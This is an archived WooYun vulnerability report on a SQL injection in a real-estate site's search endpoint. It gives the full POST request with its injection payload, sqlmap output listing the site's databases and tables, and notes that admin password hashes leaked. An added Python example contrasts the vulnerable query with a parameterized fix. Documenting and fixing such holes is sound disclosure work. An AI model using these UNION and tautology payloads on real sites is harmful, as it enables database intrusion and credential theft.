WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online browsing -------- http://drop.zone.ci/
2015-09-16: Details sent to the vendor, awaiting the vendor's handling
2015-09-18: Vendor confirmed; details disclosed to the vendor only
2015-09-28: Details disclosed to core white hats and experts in the relevant field
2015-10-08: Details disclosed to regular white hats
2015-10-18: Details disclosed to intern white hats
2015-11-02: Details disclosed to the public

4 databases and a large number of account passwords are involved.
1. Injection point
2. Databases involved
3. Leaked accounts and passwords

1. POST injection point (gz, cq, sh... essentially every second-level subdomain has it):

POST /index.php/house/ajax_top_search_data/?s=0.704752029851079 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept: */*
Origin: http://cq.loupan.com
Referer: http://cq.loupan.com/
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: cq.loupan.com
Cookie: nom=0; PHPSESSID=jhfoehk3f2j3s62lhkuugreor6; loupan_user_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%227110e0ec90c5ffa5d808db252953f7c7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%2214.23.175.62%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.3%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F33.0.1750.170+Safari%2F537.36+Netsparker%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1442229262%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A9%3A%22post_flag%22%3Bi%3A59554%3B%7D94fd5d129a521eea870d85fa4d96d619; loadDomain=http%3A%2F%2Fcq.loupan.com%2F; search_keyword_site_id=296
Accept-Encoding: gzip, deflate
Content-Length: 18
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

kw=-1+OR+17-7%3d10
2. Databases involved:

Place: POST
Parameter: kw
    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: kw=-1 OR 17-7=10' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7868693a,0x744962577243676a784d,0x3a7263723a), NULL#
---
[13:56:42] [INFO] the back-end DBMS is MySQL
web server operating system: Windows NT 4.0
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5
[13:56:42] [INFO] fetching database names
available databases [4]:
[*] haiwai
[*] information_schema
[*] loupan2013
[*] wenda

Excerpt of tables:
Database: loupan2013
[132 tables]
+------------------------------------+
| coreseek_counter                   |
| lp_admin                           |
| lp_admin_log                       |
| lp_admin_permissions               |
| lp_admin_roles                     |
| lp_admin_roles_permissions         |
| lp_admin_sites                     |
| lp_ads                             |
| lp_ads_pages                       |
| lp_ads_positions                   |
| lp_ads_sites                       |
| lp_attachments                     |
| lp_broker                          |
| lp_changelog                       |
| lp_ci_sessions                     |
| lp_cities                          |
| lp_cities_price                    |
| lp_consultant                      |
| lp_contact_info                    |
| lp_customer_purchase_intention     |
| lp_dissertation                    |
| lp_dissertation_model              |
| lp_email_bind                      |
| lp_email_get_password              |
| lp_email_validate                  |
| lp_fangdai_bbs                     |
| lp_feedback                        |
| lp_fenxiao_balance                 |
| lp_fenxiao_balance_application     |
| lp_fenxiao_balance_history         |
| lp_fenxiao_clients                 |
| lp_fenxiao_clients_disengagement   |
| lp_fenxiao_history                 |
| lp_fenxiao_new_broker              |
| lp_fenxiao_referrals               |
| lp_fenxiao_referrals_history       |
| lp_fenxiao_site_msg                |
| lp_fenxiao_user_collect            |
| lp_fenxiao_view                    |
| lp_fenxiao_xieyi                   |
| lp_forum                           |
| lp_friend_categories               |
| lp_friend_link_application         |
| lp_friend_link_investigation_cycle |
| lp_friend_link_investigation_error |
| lp_friend_links                    |
| lp_frontend_pages                  |
| lp_frontend_pages_extra            |
| lp_group_buy                       |
| lp_group_buy_forms                 |
| lp_hlink_in_news                   |
| lp_house_correction                |
| lp_houses                          |
| lp_houses_attributes               |
| lp_houses_click_cache              |
| lp_houses_comment                  |
| lp_houses_editor_comment           |
| lp_houses_fenxiao                  |
| lp_houses_info                     |
| lp_houses_parameters               |
| lp_houses_pic_draw                 |
| lp_houses_pic_effect               |
| lp_houses_pic_focus                |
| lp_houses_pic_mating               |
| lp_houses_pic_model                |
| lp_houses_pic_real                 |
| lp_houses_pic_traffic              |
| lp_houses_price_history            |
| lp_houses_prices                   |
| lp_houses_score                    |
| lp_houses_special                  |
| lp_houses_telephone_set            |
| lp_houses_thumb_cache              |
| lp_houses_trend                    |
| lp_hpyold2new                      |
| lp_information_gathering           |
| lp_loan                            |
| lp_lottery                         |
| lp_lottery_type                    |
| lp_loupandai_msg                   |
| lp_loupandai_token                 |
| lp_merchants                       |
| lp_message                         |
| lp_news                            |
| lp_news_backup                     |
| lp_news_categories                 |
| lp_news_info                       |
| lp_news_keywords                   |
| lp_news_position                   |
| lp_news_position_relation          |
| lp_notice                          |
| lp_notice_new                      |
| lp_notice_new_record               |
| lp_sites                           |
| lp_sms                             |
| lp_sms_queue                       |
| lp_special_keywords                |
| lp_special_keywords_comments       |
| lp_special_keywords_old            |
| lp_special_keywords_old_related    |
| lp_store                           |
| lp_syn_phone_config                |
| lp_telephone_balance               |
| lp_telephone_cost                  |
| lp_telephone_cost_bak              |
| lp_telephone_cost_bak201569        |
| lp_telephone_history               |
| lp_telephone_queue                 |
| lp_telephone_recharge_history      |
| lp_telephone_set_pool              |
| lp_toupiao                         |
| lp_user_atuo_refresh_templet       |
| lp_user_balance                    |
| lp_user_balance_history            |
| lp_user_collect                    |
| lp_user_combo                      |
| lp_user_operation_auto_refresh     |
| lp_user_operation_promotion        |
| lp_user_operation_refresh          |
| lp_user_operation_top              |
| lp_users                           |
| lp_users_accepter                  |
| lp_users_link_accepter             |
| lp_users_link_provider             |
| lp_users_provider                  |
| lp_weixin                          |
| lp_weixin_member                   |
| lp_weixin_member_pio               |
| lp_weixin_message                  |
| lp_xfbiaoqian                      |
| lp_youhui_class                    |
| lp_youhui_list                     |
+------------------------------------+
3. Leaked accounts and passwords:

Fortunately they are not plaintext, but they are MD5 hashes whose corresponding passwords can be found on an MD5 lookup site, so users should still be told to change their passwords.

Fix suggestion: filter the parameter.
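The block below is an added example, not code from the report or from loupan.com. It reproduces the mechanics of the kw injection above against an in-memory SQLite table and shows what "filter the parameter" should mean in practice: bind kw as a query parameter instead of splicing it into the SQL text. The handler shape (a LIKE search over an assumed lp_houses table, an assumed lp_admin table with an MD5 password column) and the sample rows are constructed assumptions; the site's real schema and code are not on the page. The only thing taken from the report is the quoting context: the leading `'` in the sqlmap payload closes a single-quoted string literal, and the `17-7=10` tautology is the scanner's boolean probe. SQLite is used so the block runs offline; where MySQL syntax differs (the `#` comment, `CONCAT`) the comments say so.

```python
import sqlite3

# Constructed sample data standing in for the report's loupan2013 schema;
# the real column layout of lp_houses / lp_admin is not on the page.
SAMPLE_SCHEMA = """
CREATE TABLE lp_houses (id INTEGER PRIMARY KEY, name TEXT, city TEXT);
INSERT INTO lp_houses VALUES (1, 'Riverside Garden', 'cq');
INSERT INTO lp_houses VALUES (2, 'Lakeview Tower', 'cq');
INSERT INTO lp_houses VALUES (3, 'Hilltop Villas', 'sh');
CREATE TABLE lp_admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
-- unsalted MD5 of '123456': the kind of hash the report says was stored
INSERT INTO lp_admin VALUES (1, 'admin', 'e10adc3949ba59abbe56e057f20f883e');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    return conn


def search_vulnerable(conn, kw):
    """Assumed shape of the original handler: kw is spliced into a
    single-quoted LIKE pattern, the context that the leading quote of the
    sqlmap payload closes."""
    sql = "SELECT id, name, city FROM lp_houses WHERE name LIKE '%" + kw + "%'"
    return conn.execute(sql).fetchall()


def search_fixed(conn, kw):
    """Bound parameter: the driver sends kw as data, so quotes, OR and
    UNION inside it are just characters to match. LIKE wildcards (% and _)
    are still interpreted; escape them as well if exact matching is wanted."""
    sql = "SELECT id, name, city FROM lp_houses WHERE name LIKE ?"
    return conn.execute(sql, ("%" + kw + "%",)).fetchall()


PAYLOADS = {
    "benign": "Lakeview",
    # Boolean probe: the report's 17-7=10 tautology placed after a closing
    # quote. SQLite comments with '-- '; MySQL (the report's backend) also
    # accepts '#', which is what the sqlmap payload ends with.
    "tautology": "-1' OR 17-7=10 -- ",
    # UNION with the three NULL-padded columns sqlmap found, reading a
    # different table. MySQL would use CONCAT(); SQLite concatenates with ||.
    "union": "-1' UNION ALL SELECT NULL, username || ':' || password, NULL "
             "FROM lp_admin -- ",
}


def run_payloads():
    """Return {payload name: (rows from vulnerable handler, rows from fixed handler)}."""
    conn = make_db()
    return {name: (search_vulnerable(conn, p), search_fixed(conn, p))
            for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, (vuln_rows, fixed_rows) in run_payloads().items():
        print(f"{name:10s} vulnerable={len(vuln_rows)} rows  fixed={len(fixed_rows)} rows")
        for row in vuln_rows:
            print("   ", row)
```

The tautology returns every house from the concatenated query and nothing from the bound one; the UNION row carries the admin hash out through the same search endpoint, which is the path the report's database listing was obtained over. Input filtering alone (stripping quotes, blocking the word UNION) is a weaker fix than binding, because it has to anticipate every encoding the DBMS accepts.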
Severity: High
Vulnerability Rank: 20
Confirmation time: 2015-09-18 14:05
Already fixed, thank you for your attention. Also, please make the masking on the screenshots of leaked data heavier.
None yet.